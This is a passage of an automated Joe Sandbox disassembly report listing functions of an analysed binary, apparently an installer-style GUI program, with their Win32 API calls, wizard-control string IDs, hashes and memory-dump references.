                                                                                  • Instruction Fuzzy Hash: 1051E5316095257ADA05B7269C42EEE329E9F46334F20070FF431B62E3EF6C564243AE
                                                                                  Function 0042003F Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 145windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00420044
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00420070
                                                                                    • Part of subcall function 004515F6: __EH_prolog.LIBCMT ref: 004515FB
                                                                                    • Part of subcall function 004515F6: IsWindow.USER32(?), ref: 00451629
                                                                                    • Part of subcall function 004515F6: SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0045164B
                                                                                    • Part of subcall function 004515F6: SendMessageA.USER32(?,00000149,00000000,00000000), ref: 00451662
                                                                                    • Part of subcall function 004515F6: SendMessageA.USER32(?,00000148,00000000,00000000), ref: 0045167F
                                                                                    • Part of subcall function 004519D9: SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004519FB
                                                                                  • IsWindow.USER32(?), ref: 004200CD
                                                                                  • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 004200E4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$H_prolog$Window$__ftol
                                                                                  • String ID: Enabled$ItemCount$Selected$Sorted$Text$Visible
                                                                                  • API String ID: 4272088191-211786709
                                                                                  • Opcode ID: f974b0529d35a33abd1e791975ba957fcacf6b0ae9d2213bbd83debd46b2a923
                                                                                  • Instruction ID: 194c7facc02b451eb1ef1c94f618bb1664aefb20aab39796094a26b7080ab279
                                                                                  • Opcode Fuzzy Hash: f974b0529d35a33abd1e791975ba957fcacf6b0ae9d2213bbd83debd46b2a923
                                                                                  • Instruction Fuzzy Hash: 5D41B371901524BACB01BBA69C42EDF7A6DEF85388F04041FF411A2162DB3D5653C7BE
                                                                                  Function 004606F1 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 123windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004606F6
                                                                                  • IsWindow.USER32(?), ref: 0046072C
                                                                                  • GetNextDlgTabItem.USER32(?,?,00000001), ref: 0046074B
                                                                                  • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 004607FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prologItemMessageNextSendWindow
                                                                                  • String ID: &$Checked$false$noD$tTQ$true
                                                                                  • API String ID: 3580624722-1106302426
                                                                                  • Opcode ID: dca2a365dddfc61ed5e354935dca3ac59a44743440ff9d5626e72be7573642af
                                                                                  • Instruction ID: 28ff760f15f42cd65ef503e641e3190d86d982c4781f83b21768024c4cc5f26e
                                                                                  • Opcode Fuzzy Hash: dca2a365dddfc61ed5e354935dca3ac59a44743440ff9d5626e72be7573642af
                                                                                  • Instruction Fuzzy Hash: D341B030600701AFDB55EF75C884B6ABBA0FF04754F14812EF4159B292EBB8ED41CB99
                                                                                  Function 004689D6 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 200COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004689DB
                                                                                  • GetSystemMetrics.USER32(00000006), ref: 00468A73
                                                                                  • GetSystemMetrics.USER32(00000006), ref: 00468AEB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MetricsSystem$H_prolog
                                                                                  • String ID: IDS_CTRL_BUTTON_BACK$IDS_CTRL_BUTTON_CANCEL$IDS_CTRL_BUTTON_HELP$IDS_CTRL_BUTTON_NEXT
                                                                                  • API String ID: 2939012833-2679619293
                                                                                  • Opcode ID: f80d64fba93162bef99e389bc0197450a3df3037497501e8d862b8afc100e3bf
                                                                                  • Instruction ID: 612bf3bb3a1a5bad5035dd40488528eb03de75a8191c976b0f81d4a9463d381d
                                                                                  • Opcode Fuzzy Hash: f80d64fba93162bef99e389bc0197450a3df3037497501e8d862b8afc100e3bf
                                                                                  • Instruction Fuzzy Hash: 4F7140B1910219ABCF14DFA5DD56FEF7BB9AF44704F00412EF405B6282DB74A904CBAA
                                                                                  Function 0042509D Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 186COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004250A2
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 004250C9
                                                                                    • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                  • IsWindow.USER32(?), ref: 0042521C
                                                                                  • IsWindow.USER32(?), ref: 00425248
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                    • Part of subcall function 00455BD8: __EH_prolog.LIBCMT ref: 00455BDD
                                                                                    • Part of subcall function 00455BD8: IsWindow.USER32(?), ref: 00455BFB
                                                                                    • Part of subcall function 00455BD8: SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00455C16
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00425275
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Window$DecrementInterlockedInvalidateMessageRectSend__ftol
                                                                                  • String ID: Checked$Enabled$Text$Visible
                                                                                  • API String ID: 261235082-2599746497
                                                                                  • Opcode ID: 5cceee0881ff548e176cad677caf86ad67c8ca544d22b0bbc4181bc5c5491aaf
                                                                                  • Instruction ID: 8ae7388ca80d83f429b13d206ecbb42e3e0e0e04d6b41a6f87d24118d469437d
                                                                                  • Opcode Fuzzy Hash: 5cceee0881ff548e176cad677caf86ad67c8ca544d22b0bbc4181bc5c5491aaf
                                                                                  • Instruction Fuzzy Hash: A65149316055207BDB11BB26AC46FAF366D9F46368F10051FF811A61D3DF3C9642876D
                                                                                  Function 004688E5 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004688EA
                                                                                    • Part of subcall function 0045FDEB: __EH_prolog.LIBCMT ref: 0045FDF0
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 0045FEA5: __EH_prolog.LIBCMT ref: 0045FEAA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$lstrlen
                                                                                  • String ID: < Back$Cancel$Help$IDS_CTRL_BUTTON_BACK$IDS_CTRL_BUTTON_CANCEL$IDS_CTRL_BUTTON_HELP$IDS_CTRL_BUTTON_NEXT$Next >
                                                                                  • API String ID: 3243491680-298686068
                                                                                  • Opcode ID: 2c72c62cae1d5018aff026f11301bb40ff7173ace604c7562fd34bdc8b5b7b12
                                                                                  • Instruction ID: 8c301571b7883f3645e14ba8901b0c362cf74ec3eff5d7f916d91cd58e861c36
                                                                                  • Opcode Fuzzy Hash: 2c72c62cae1d5018aff026f11301bb40ff7173ace604c7562fd34bdc8b5b7b12
                                                                                  • Instruction Fuzzy Hash: D42188B4724705B7DF08AB5AC917ADEBEB5AF85B24F10420EF011632D2CBB41B4485EB
                                                                                  Function 00454C14 Relevance: 15.2, APIs: 10, Instructions: 164windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindow.USER32(?), ref: 00454C34
                                                                                  • SendMessageA.USER32(?,00000184,00000000,00000000), ref: 00454C67
                                                                                  • SendMessageA.USER32(?,00000181,00000001,000000FF), ref: 00454CAC
                                                                                  • SendMessageA.USER32(?,0000019A,?,00000000), ref: 00454CCF
                                                                                  • SendMessageA.USER32(?,0000019A,?,?), ref: 00454CF3
                                                                                  • SendMessageA.USER32(?,00000186,?,00000000), ref: 00454D0E
                                                                                  • SendMessageA.USER32(?,00000181,00000000,000000FF), ref: 00454D41
                                                                                  • SendMessageA.USER32(?,0000019A,?,00000000), ref: 00454D64
                                                                                  • SendMessageA.USER32(?,0000019A,?,?), ref: 00454D88
                                                                                  • SendMessageA.USER32(?,00000186,?,00000000), ref: 00454DB2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window
                                                                                  • String ID:
                                                                                  • API String ID: 2326795674-0
                                                                                  • Opcode ID: 8f2468835ad3312e93362015da2098edacac8a0770c60b20d7f4a0a72416559a
                                                                                  • Instruction ID: 3741a7c1c24c1cb75be0db8dd9dd1501e9cb8208216c68b45ba79b71b896bc8b
                                                                                  • Opcode Fuzzy Hash: 8f2468835ad3312e93362015da2098edacac8a0770c60b20d7f4a0a72416559a
                                                                                  • Instruction Fuzzy Hash: EB514931204B04AFD726DF61C884E67B7E9FF84309F11482EFA524E2A2C775E899CB55
                                                                                  Function 004205ED Relevance: 15.2, APIs: 10, Instructions: 150windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00420614
                                                                                  • __ftol.LIBCMT ref: 00420626
                                                                                  • IsWindow.USER32(?), ref: 0042065E
                                                                                  • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 00420687
                                                                                  • SendMessageA.USER32(?,00000144,?,00000000), ref: 004206B1
                                                                                  • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 004206CA
                                                                                  • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 004206D6
                                                                                  • SendMessageA.USER32(?,00000144,00000000,00000000), ref: 004206EB
                                                                                  • IsWindow.USER32(?), ref: 0042074E
                                                                                  • InvalidateRect.USER32(?,-00000018,00000001), ref: 0042076C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window__ftol$H_prologInvalidateRect
                                                                                  • String ID:
                                                                                  • API String ID: 1719125992-0
                                                                                  • Opcode ID: 7cb3b3f9666ef157e19739827c140fd9d8d5d45e013193b0e25331d8bfe78057
                                                                                  • Instruction ID: 2ffe84984871c3027cda14e9c8aa56fe3210c7d7d31b05157b291f12c7be0fd5
                                                                                  • Opcode Fuzzy Hash: 7cb3b3f9666ef157e19739827c140fd9d8d5d45e013193b0e25331d8bfe78057
                                                                                  • Instruction Fuzzy Hash: 0951FF70B00204AFDB10AF65DC81FAEB7F9EF84354F10416AF511AB2A2C775ED018B18
                                                                                  Function 004D0C75 Relevance: 15.1, APIs: 10, Instructions: 138windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004CD8A9: GetFocus.USER32 ref: 004CD8AC
                                                                                    • Part of subcall function 004CD8A9: GetParent.USER32(00000000), ref: 004CD8D3
                                                                                    • Part of subcall function 004CD8A9: GetWindowLongA.USER32(?,000000F0), ref: 004CD8EE
                                                                                    • Part of subcall function 004CD8A9: GetParent.USER32(?), ref: 004CD8FC
                                                                                    • Part of subcall function 004CD8A9: GetDesktopWindow.USER32 ref: 004CD900
                                                                                    • Part of subcall function 004CD8A9: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 004CD914
                                                                                  • GetMenu.USER32(?), ref: 004D0CD8
                                                                                  • GetMenu.USER32(?), ref: 004D0CEC
                                                                                  • GetMenuItemCount.USER32(00000000), ref: 004D0CF5
                                                                                  • GetSubMenu.USER32(00000000,00000000), ref: 004D0D06
                                                                                  • GetMenuItemCount.USER32(?), ref: 004D0D28
                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 004D0D49
                                                                                  • GetSubMenu.USER32(?,00000000), ref: 004D0D61
                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 004D0D79
                                                                                  • GetMenuItemCount.USER32(?), ref: 004D0DB0
                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 004D0DCE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 4186786570-0
                                                                                  • Opcode ID: 0debe1f924bc02a775c3aa9032df7bacf404f99ac1004392f5b1729142f363f0
                                                                                  • Instruction ID: 40e995ccb6f6249068410447ab5fb884eb47b81117ecbe1e04c50fa178d65bc5
                                                                                  • Opcode Fuzzy Hash: 0debe1f924bc02a775c3aa9032df7bacf404f99ac1004392f5b1729142f363f0
                                                                                  • Instruction Fuzzy Hash: C9518E30900208AFDF11AFA5D991BAEBBB6EF08754F20446BE411A7355D739ED41CF28
                                                                                  Function 00468CF4 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 330COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00468CF9
                                                                                    • Part of subcall function 0045DC9C: __EH_prolog.LIBCMT ref: 0045DCA1
                                                                                    • Part of subcall function 0047AAD1: __EH_prolog.LIBCMT ref: 0047AAD6
                                                                                    • Part of subcall function 004603AA: __EH_prolog.LIBCMT ref: 004603AF
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                    • Part of subcall function 00454E3A: __EH_prolog.LIBCMT ref: 00454E3F
                                                                                    • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                  Strings
                                                                                  • IDS_CTRL_PROGRESS_BAR_01, xrefs: 00468F04
                                                                                  • IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS, xrefs: 00468D49
                                                                                  • IDS_CTRL_STATICTEXT_LABEL_04, xrefs: 00469036
                                                                                  • IDS_CTRL_STATICTEXT_LABEL_03, xrefs: 00468FA2
                                                                                  • IDS_CTRL_PROGRESS_BAR_02, xrefs: 004690CA
                                                                                  • IDS_CTRL_STATICTEXT_LABEL_02, xrefs: 00468E70
                                                                                  • IDS_CTRL_STATICTEXT_LABEL_01, xrefs: 00468DDC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Interlocked$DecrementIncrement
                                                                                  • String ID: IDS_CTRL_PROGRESS_BAR_01$IDS_CTRL_PROGRESS_BAR_02$IDS_CTRL_STATICTEXT_LABEL_01$IDS_CTRL_STATICTEXT_LABEL_02$IDS_CTRL_STATICTEXT_LABEL_03$IDS_CTRL_STATICTEXT_LABEL_04$IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS
                                                                                  • API String ID: 715401920-1731404472
                                                                                  • Opcode ID: b251297bc3d9f83e4353b3722c6238dd84c630356f127f3574db16ba71a07e1b
                                                                                  • Instruction ID: 1451af9f752c7748da8382218d3823aed40bc90db31f78edffccaf2cf1677070
                                                                                  • Opcode Fuzzy Hash: b251297bc3d9f83e4353b3722c6238dd84c630356f127f3574db16ba71a07e1b
                                                                                  • Instruction Fuzzy Hash: 5AD1B470910B06EFDB08EFA6C546BAEBBB4FF44314F10421EE115932C1DBB86A45CBA5
                                                                                  Function 004A8C0D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 231memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004A8C12
                                                                                  • MapDialogRect.USER32(?,?), ref: 004A8C98
                                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004A8CB9
                                                                                  • CLSIDFromString.COMBASE(0000FFFC,?), ref: 004A8DA4
                                                                                  • CLSIDFromProgID.COMBASE(0000FFFC,?), ref: 004A8DAC
                                                                                  • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,?,00000004,00000000), ref: 004A8E48
                                                                                  • SysFreeString.OLEAUT32(?), ref: 004A8E9B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
                                                                                  • String ID: `)u
                                                                                  • API String ID: 493809305-4279031584
                                                                                  • Opcode ID: 52e7da8a504d2fca83c272cb21f6d6b107f995ec09474645a191b80d75a62b78
                                                                                  • Instruction ID: 8813362095b8ba78aaa6a862ce004866a4c54f64cac5c81e78be0cfb35a0b316
                                                                                  • Opcode Fuzzy Hash: 52e7da8a504d2fca83c272cb21f6d6b107f995ec09474645a191b80d75a62b78
                                                                                  • Instruction Fuzzy Hash: 59A14B7190021ADFDB04DFA5C984AEEBBB4FF19304F14812EE815A7351E7789E54CBA8
                                                                                  Function 0043012E Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 213libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00430133
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                  • GetProcAddress.KERNEL32(00000000,MsiGetUserInfoA), ref: 00430190
                                                                                    • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
